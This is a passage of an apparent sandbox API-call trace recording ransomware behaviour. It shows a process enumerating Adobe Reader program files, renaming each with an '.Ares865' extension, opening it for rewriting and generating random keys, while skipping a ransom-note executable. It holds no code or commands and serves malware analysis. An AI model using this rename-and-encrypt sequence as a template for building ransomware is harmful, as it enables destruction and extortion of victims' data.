pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.038] lstrcpyW (in: lpString1=0x2cce460, lpString2="cryptocme2.sig" | out: lpString1="cryptocme2.sig") returned="cryptocme2.sig" [0168.038] lstrlenW (lpString="cryptocme2.sig") returned 14 [0168.038] lstrlenW (lpString="Ares865") returned 7 [0168.038] lstrcmpiW (lpString1="me2.sig", lpString2="Ares865") returned 1 [0168.038] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig.Ares865") returned 70 [0168.038] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.sig"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.sig.ares865"), dwFlags=0x1) returned 1 [0168.042] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.sig.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1607) returned 1 [0168.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.043] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.043] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.046] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.047] lstrcpyW (in: lpString1=0x2cce460, lpString2="Eula.exe" | out: lpString1="Eula.exe") returned="Eula.exe" [0168.047] lstrlenW (lpString="Eula.exe") returned 8 [0168.047] lstrlenW (lpString="Ares865") returned 7 [0168.047] lstrcmpiW (lpString1="ula.exe", lpString2="Ares865") returned 1 [0168.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe.Ares865") returned 64 [0168.047] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\eula.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\eula.exe.ares865"), dwFlags=0x1) returned 1 [0168.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Eula.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\eula.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94608) returned 1 [0168.050] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.051] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.057] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.057] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.059] lstrcpyW (in: lpString1=0x2cce460, lpString2="ExtendScript.dll" | out: lpString1="ExtendScript.dll") returned="ExtendScript.dll" [0168.059] lstrlenW (lpString="ExtendScript.dll") returned 16 [0168.059] lstrlenW (lpString="Ares865") returned 7 [0168.059] lstrcmpiW (lpString1="ipt.dll", lpString2="Ares865") returned 1 [0168.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ExtendScript.dll.Ares865") returned 72 [0168.060] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ExtendScript.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\extendscript.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ExtendScript.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\extendscript.dll.ares865"), dwFlags=0x1) returned 1 [0168.062] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\ExtendScript.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\extendscript.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=670624) returned 1 [0168.062] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.091] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.092] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.092] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.101] lstrcpyW (in: lpString1=0x2cce460, lpString2="icucnv40.dll" | out: lpString1="icucnv40.dll") returned="icucnv40.dll" [0168.101] lstrlenW (lpString="icucnv40.dll") returned 12 [0168.101] lstrlenW (lpString="Ares865") returned 7 [0168.101] lstrcmpiW (lpString1="v40.dll", lpString2="Ares865") returned 1 [0168.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icucnv40.dll.Ares865") returned 68 [0168.101] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icucnv40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icucnv40.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icucnv40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icucnv40.dll.ares865"), dwFlags=0x1) returned 1 [0168.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icucnv40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icucnv40.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.105] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=721832) returned 1 [0168.105] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.106] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.106] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.142] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.153] lstrcpyW (in: lpString1=0x2cce460, lpString2="icudt40.dll" | out: lpString1="icudt40.dll") returned="icudt40.dll" [0168.153] lstrlenW (lpString="icudt40.dll") returned 11 [0168.153] lstrlenW (lpString="Ares865") returned 7 [0168.153] lstrcmpiW (lpString1="t40.dll", lpString2="Ares865") returned 1 [0168.154] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll.Ares865") returned 67 [0168.154] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll.ares865"), dwFlags=0x1) returned 1 [0168.157] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.157] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96144) returned 1 [0168.158] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.158] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.159] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.165] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.166] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.166] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.168] lstrcpyW (in: lpString1=0x2cce460, lpString2="icudt40_full.dll" | out: lpString1="icudt40_full.dll") returned="icudt40_full.dll" [0168.168] lstrlenW (lpString="icudt40_full.dll") returned 16 [0168.168] lstrlenW (lpString="Ares865") returned 7 [0168.168] lstrcmpiW (lpString1="ull.dll", lpString2="Ares865") returned 1 [0168.168] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll.Ares865") returned 72 [0168.168] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40_full.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40_full.dll.ares865"), dwFlags=0x1) returned 1 [0168.171] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icudt40_full.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icudt40_full.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.171] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13922216) returned 1 [0168.172] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.172] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.172] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.387] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.387] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.387] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.409] lstrcpyW (in: lpString1=0x2cce460, lpString2="icuuc40.dll" | out: lpString1="icuuc40.dll") returned="icuuc40.dll" [0168.409] lstrlenW (lpString="icuuc40.dll") returned 11 [0168.409] lstrlenW (lpString="Ares865") returned 7 [0168.409] lstrcmpiW (lpString1="c40.dll", lpString2="Ares865") returned 1 [0168.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll.Ares865") returned 67 [0168.409] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll.ares865"), dwFlags=0x1) returned 1 [0168.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\icuuc40.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\icuuc40.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1126824) returned 1 [0168.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.414] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.414] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.461] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.462] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.462] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.477] lstrcpyW (in: lpString1=0x2cce460, lpString2="IDTemplates" | out: lpString1="IDTemplates") returned="IDTemplates" [0168.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7928 [0168.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1708 [0168.477] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7930 | out: ListHead=0x2e7710, ListEntry=0x2e7930) returned 0x2e7910 [0168.477] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ffe6ce0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5607cc40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5607cc40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Javascripts", cAlternateFileName="JAVASC~1")) returned 1 [0168.477] lstrcmpiW (lpString1="Javascripts", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0168.477] lstrcmpiW (lpString1="Javascripts", lpString2="aoldtz.exe") returned 1 [0168.477] lstrcpyW (in: lpString1=0x2cce460, lpString2="Javascripts" | out: lpString1="Javascripts") returned="Javascripts" [0168.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0168.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x78) returned 0x2c1788 [0168.477] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0168.477] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ffc0b80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa6790, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JP2KLib.dll", cAlternateFileName="")) returned 1 [0168.477] lstrcmpiW (lpString1="JP2KLib.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0168.477] lstrcmpiW (lpString1="JP2KLib.dll", lpString2="aoldtz.exe") returned 1 [0168.477] lstrcpyW (in: lpString1=0x2cce460, lpString2="JP2KLib.dll" | out: lpString1="JP2KLib.dll") returned="JP2KLib.dll" [0168.477] lstrlenW (lpString="JP2KLib.dll") returned 11 [0168.477] lstrlenW (lpString="Ares865") returned 7 [0168.477] lstrcmpiW (lpString1="Lib.dll", lpString2="Ares865") returned 1 [0168.478] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll.Ares865") returned 67 [0168.478] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll.ares865"), dwFlags=0x1) returned 1 [0168.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\JP2KLib.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\jp2klib.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.481] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=681872) returned 1 [0168.481] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.482] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.482] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.516] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.520] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.520] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.560] lstrcpyW (in: lpString1=0x2cce460, lpString2="Legal" | out: lpString1="Legal") returned="Legal" [0168.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0168.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2e4788 [0168.560] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0168.560] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d618a80, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54d25980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54d25980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Locale", cAlternateFileName="")) returned 1 [0168.560] lstrcmpiW (lpString1="Locale", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0168.560] lstrcmpiW (lpString1="Locale", lpString2="aoldtz.exe") returned 1 [0168.560] lstrcpyW (in: lpString1=0x2cce460, lpString2="Locale" | out: lpString1="Locale") returned="Locale" [0168.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0168.560] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6e) returned 0x2e4800 [0168.560] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0168.561] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e1a400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x59de0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logsession.dll", cAlternateFileName="LOGSES~1.DLL")) returned 1 [0168.561] lstrcmpiW (lpString1="logsession.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0168.561] lstrcmpiW (lpString1="logsession.dll", lpString2="aoldtz.exe") returned 1 [0168.561] lstrcpyW (in: lpString1=0x2cce460, lpString2="logsession.dll" | out: lpString1="logsession.dll") returned="logsession.dll" [0168.561] lstrlenW (lpString="logsession.dll") returned 14 [0168.561] lstrlenW (lpString="Ares865") returned 7 [0168.561] lstrcmpiW (lpString1="ion.dll", lpString2="Ares865") returned 1 [0168.561] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\logsession.dll.Ares865") returned 70 [0168.561] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\logsession.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logsession.dll"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\logsession.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logsession.dll.ares865"), dwFlags=0x1) returned 1 [0168.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\logsession.dll.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logsession.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.575] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=368096) returned 1 [0168.576] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.576] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.576] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.673] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.674] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.674] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.679] lstrcpyW (in: lpString1=0x2cce460, lpString2="LogTransport2.exe" | out: lpString1="LogTransport2.exe") returned="LogTransport2.exe" [0168.680] lstrlenW (lpString="LogTransport2.exe") returned 17 [0168.680] lstrlenW (lpString="Ares865") returned 7 [0168.680] lstrcmpiW (lpString1="rt2.exe", lpString2="Ares865") returned 1 [0168.680] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\LogTransport2.exe.Ares865") returned 73 [0168.680] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\LogTransport2.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logtransport2.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\LogTransport2.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logtransport2.exe.ares865"), dwFlags=0x1) returned 1 [0168.683] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\LogTransport2.exe.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\logtransport2.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0168.683] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=315872) returned 1 [0168.684] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0168.684] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0168.684] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.771] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0168.772] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0168.772] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0168.776] lstrcpyW (in: lpString1=0x2cce460, lpString2="Onix32.dll" | out: lpString1="Onix32.dll") returned="Onix32.dll" 